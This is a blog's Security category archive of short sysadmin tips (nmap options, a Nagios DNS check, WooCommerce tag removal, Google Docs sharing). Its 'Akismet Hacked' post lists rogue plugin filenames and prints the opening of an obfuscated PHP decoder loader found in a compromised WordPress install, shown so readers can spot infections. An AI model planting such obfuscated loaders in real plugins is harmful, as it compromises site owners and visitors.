Category Archives: Security

Does Git change file permissions?

Posted on Fri, 03 Aug 2012 21:32:28 +0000

Yes it does. Don’t go working away, for instance, putting you /etc directory in git and then switching branches. Git may change your directories to 755 and your files to 644 which will cause the system problems with security, and may even prevent booting. look at etckeeper or this tutorial for more information about keeping /etc in a git repo, but the answer to “Does Git change file permissions?” is a definitive “Yes”

Posted in Security, Server Admin, Web Development | Tagged git | Leave a comment

nmap scans ips and ports

Posted on Mon, 30 Jul 2012 19:20:58 +0000

A useful linux/unix tool, nmap scans ips and ports of given hosts: Nmap 5.21 ( http://nmap.org ) Usage: nmap [Scan Type(s)] [Options] {target specification} TARGET SPECIFICATION: Can pass hostnames, IP addresses, networks, etc. Ex: scanme.nmap.org, 192.168.0.1; 10.0.0-255.1-254 -iL <inputfilename>: Input from list of hosts/networks -iR <num hosts>: Choose random targets –exclude <host1 [,host2][,host3],…>: Exclude hosts/networks –excludefile <exclude_file>: Exclude list from file HOST DISCOVERY: -sL: List Scan – simply list targets to scan -sP: Ping Scan – go no further than determining if host is online -PN: Treat all hosts as online — skip host discovery -PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports -PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes -PO[protocol list]: IP Protocol Ping -n/-R: Never do DNS resolution/Always resolve [default: sometimes] –dns-servers <serv1 [,serv2],…>: Specify custom DNS servers –system-dns: Use OS’s DNS resolver –traceroute: Trace hop path to each host SCAN TECHNIQUES: -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans -sU: UDP Scan -sN/sF/sX: TCP Null, FIN, and Xmas scans –scanflags <flags>: Customize TCP scan flags -sI <zombie host[:probeport]>: Idle scan -sY/sZ: SCTP INIT/COOKIE-ECHO scans -sO: IP protocol scan -b <ftp relay host>: FTP bounce scan PORT SPECIFICATION AND SCAN ORDER: -p <port ranges>: Only scan specified ports Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080 -F: Fast mode – Scan fewer ports than the default scan -r: Scan ports consecutively – don’t randomize –top-ports <number>: Scan </number><number> most common ports –port-ratio <ratio>: Scan ports more common than </ratio><ratio> SERVICE/VERSION DETECTION: -sV: Probe open ports to determine service/version info –version-intensity <level>: … Continue reading →

Posted in Security, Server Admin, Tech Tips | Tagged cli, linux, nmap, unix | Leave a comment

How to do a Random Drawing / pick at random using Excel

Posted on Wed, 09 May 2012 23:52:30 +0000

Are you running a contest or sweepstakes an need a system to pick random winners out of a pool of names? You could take the old-school approach of writing names on business cards and pulling them out of a fishbowl, or you could use Microsoft Excel. Put the names in an excel sheet. add a column and put =RAND() in it. it will give a random number that is recalculated every time a change is made on the sheet. choose that column and click sort “a-z” (or z-a). it won’t matter because each time you do it will randomize the names. Just pick the top one (or top 10) after sorting it.

Posted in Random, Security, Tech Tips | Tagged contest, drawing, excel, microsoft, numbers, randomize, sweepstakes, winner | 1 Comment

nagios check_dns / check_ip example

Posted on Mon, 26 Mar 2012 17:20:33 +0000

Need to monitor an IP address / DNS entry with Nagios? Nagios has a plugin called check_dns just for that. The check commands are defined in this file: /etc/nagios-plugins/config/dns.cfg # ‘check_dns’ command definition define command{ command_name check_dns command_line /usr/lib/nagios/plugins/check_dns -H www.google.com -s ‘$HOSTADDRESS$’ } # ‘check_dig’ command definition define command{ command_name check_dig command_line /usr/lib/nagios/plugins/check_dig -H ‘$HOSTADDRESS$’ -l ‘$ARG1$’ } here is an alternate version I wrote to check the IP of a host, I could have used check_ip because I don’t think that command is taken, but instead I used my_check_dns: #my_check_dns command, checks to make sure a hostname resolved to a specified IP address: define command { command_name my_check_dns command_line /usr/lib/nagios/plugins/check_dns -H $ARG1$ -a $ARG2$ } this is how it would be implemented in a service: define service{ use generic-service ; Name of service template to use host_name mysite.com service_description check dns check_command my_check_dns!www.mysite.com!123.456.78.90 } Man Page: check_dns v1.4.14 (nagios-plugins 1.4.14) Copyright (c) 1999 Ethan Galstad <nagios @nagios.org> Copyright (c) 2000-2008 Nagios Plugin Development Team <nagiosplug [email protected]> This plugin uses the nslookup program to obtain the IP address for the given host/domain query. An optional DNS server to use may be specified. If no DNS server is specified, the default server(s) specified in /etc/resolv.conf will be used. Usage:check_dns -H host [-s server] [-a expected-address] [-A] [-t timeout] [-w warn] [-c crit] Options: -h, –help Print detailed help screen -V, –version Print version information -H, –hostname=HOST The name or address you want to query -s, –server=HOST Optional DNS server you … Continue reading →

Posted in Security, Server Admin | Tagged dns, ip, linux, monitor, nagios | 1 Comment

Remove WooCommerce Generator Tag

Posted on Thu, 08 Mar 2012 15:29:00 +0000

If you would like to remove the Remove WooCommerce Generator Tag from the <head> section of your WordPress installation, you can add the following line somewhere, perhaps in your wordpress functions.php file: remove_action(‘wp_head’, array($GLOBALS[‘woocommerce’],’generator’)); I’ve updated the code to work with the most recent version of Woo Commerce, try adding this to the functions.php file of your WordPress theme: function remove_woo_commerce_generator_tag() { remove_action(‘wp_head’,array($GLOBALS[‘woocommerce’], ‘generator’)); } add_action(‘get_header’,’remove_woo_commerce_generator_tag’); That will prevent the following line from being shown in your HTML code: <!– WooCommerce Version –> <meta name=”generator” content=”WooCommerce 1.5″ />

Posted in Security, Tech Tips, Web Development | Tagged generator, tag, woo, woocommerce, wordpress | 8 Comments

Google Logout URL

Posted on Sat, 04 Feb 2012 17:10:06 +0000

If you’re looking for the Google Logout URL in order to sign out of Google, Google Plus, or any of Google’s Services, you have a few options. If you just want to Logout, use the following URL: https://accounts.google.com/Logout If you would like to logout and then redirect, add the continue parameter to the end of the URL. For example if you want to log out and then redirect to google.com, use this URL: https://accounts.google.com/Logout?&continue=http://www.google.com/ Google Logout It always seems like you can never find the Google Logout when you need it. You can also drag this URL to your toolbar to create a Google Logout button: Google Logout

Posted in Security, Web Development | Tagged account, google, logout | 3 Comments

Google Docs: Share Outside My Organization (solved)

Posted on Wed, 01 Feb 2012 15:03:59 +0000

If you’re facing the problem with Google Docs where the “Users can share documents outside this domain” option doesn’t work, or the following issues, see the solution below on how to fix this. These are the problems reported by others about Share Google Docs Outside Your Organization: When I’m in the sharing settings in the document there is NO option to share out of organization. I disabled the option “Users can share documents outside this domain” several time ago and now, I reactivated it in order to share documents with users outside my domain. When I want to share any document with people outside the domain I am not able to get the option to do that. When viewing document share options, I can’t see the toolbar where I am asked to allow people outside the domain to view or edit the document. When I try to get a public link to the document, I only have the option to get it for people inside the domain. Control panel options are set properly but no change is performed in Google Docs. I have another google apps domain account where I’m able to do that. In that account I’ve never disabled the share with people outside the domain. I suspect the problem comes when you disable public sharing for the very first time and then you want to reactivate it again. I don’t have the option ‘Users can publish documents to the public internet’ available. I have multiple Google Domains, to … Continue reading →

Posted in Security, Software, Web Development | Tagged docs, domain, google, google docs, google-apps, preferences, privacy, sharing | 11 Comments

Akismet Hacked

Posted on Sat, 20 Aug 2011 17:39:18 +0000

If your WordPress site has been compromised, try checking out your Akismet plugin. It’s so commonly used that its often subject to attacks. If any of these files are showing up in your plugins folder, you may be the subject of an attack: .akismet.cache.php .akismet.bak.php .akismet.old.php class-akismet.php db-akismet.php One akismet.php file that I found started out something like this: <?php if (!function_exists(“TC9A16C47DA8EEE87”)) { function TC9A16C47DA8EEE87($T059EC46CFE335260) { $T059EC46CFE335260 = base64_decode($T059EC46CFE335260); $TC9A16C47DA8EEE87 = 0; $TA7FB8B0A1C0E2E9E = 0; $T17D35BB9DF7A47E4 = 0; $T65CE9F6823D588A7 = (ord($T059EC46CFE335260[1]) << 8) + ord($T059EC46CFE335260[2]); $TBF14159DC7D007D3 = 3; $T77605D5F26DD5248 = 0; $T4A747C3263CA7A55 = 16; $T7C7E72B89B83E235 = “”; $T0D47BDF6FD9DDE2E = strlen($T059EC46CFE335260); $T43D5686285035C13 = __FILE__; $T43D5686285035C13 = file_get_contents($T43D5686285035C13); $T6BBC58A3B5B11DC4 = 0; preg_match(base64_decode(“LyhwcmludHxzcHJpbnR8ZWNobykv”), $T43D5686285035C13, $T6BBC58A3B5B11DC4); for (;$TBF14159DC7D007D3 < $T0D47BDF6FD9DDE2E;) { if (count($T6BBC58A3B5B11DC4)) exit; if ($T4A747C3263CA7A55 == 0) { $T65CE9F6823D588A7 = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) << 8); $T65CE9F6823D588A7+= ord($T059EC46CFE335260[$TBF14159DC7D007D3++]); $T4A747C3263CA7A55 = 16; } if ($T65CE9F6823D588A7 & 0x8000) { $TC9A16C47DA8EEE87 = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) << 4); $TC9A16C47DA8EEE87+= (ord($T059EC46CFE335260[$TBF14159DC7D007D3]) >> 4); if ($TC9A16C47DA8EEE87) { $TA7FB8B0A1C0E2E9E = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) & 0x0F) + 3; for ($T17D35BB9DF7A47E4 = 0;$T17D35BB9DF7A47E4 < $TA7FB8B0A1C0E2E9E;$T17D35BB9DF7A47E4++) $T7C7E72B89B83E235[$T77605D5F26DD5248 + $T17D35BB9DF7A47E4] = $T7C7E72B89B83E235[$T77605D5F26DD5248 – $TC9A16C47DA8EEE87 + $T17D35BB9DF7A47E4]; $T77605D5F26DD5248+= $TA7FB8B0A1C0E2E9E; } else { $TA7FB8B0A1C0E2E9E = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) << 8); $TA7FB8B0A1C0E2E9E+= ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) + 16; for ($T17D35BB9DF7A47E4 = 0;$T17D35BB9DF7A47E4 < $TA7FB8B0A1C0E2E9E;$T7C7E72B89B83E235[$T77605D5F26DD5248 + $T17D35BB9DF7A47E4++] = $T059EC46CFE335260[$TBF14159DC7D007D3]); $TBF14159DC7D007D3++; $T77605D5F26DD5248+= $TA7FB8B0A1C0E2E9E; } } else $T7C7E72B89B83E235[$T77605D5F26DD5248++] = $T059EC46CFE335260[$TBF14159DC7D007D3++]; $T65CE9F6823D588A7 <<= 1; $T4A747C3263CA7A55–; if ($TBF14159DC7D007D3 == $T0D47BDF6FD9DDE2E) { $T43D5686285035C13 = implode(“”, $T7C7E72B89B83E235); $T43D5686285035C13 = “?” . “>” . $T43D5686285035C13; return $T43D5686285035C13; } } } }; ?> If you want the PHP code, which is obfuscated, for the akismet.php file I came … Continue reading →

Posted in Security, Web Development | Tagged akismet, askimet, hack, wordpress | 1 Comment

Category Archives: Security

Does Git change file permissions?

nmap scans ips and ports

How to do a Random Drawing / pick at random using Excel

nagios check_dns / check_ip example

Remove WooCommerce Generator Tag

Google Logout URL

Akismet Hacked

Search

Recent Posts

Categories

Recent Comments

Category Archives: Security

Search

Recent Posts

Tags

Categories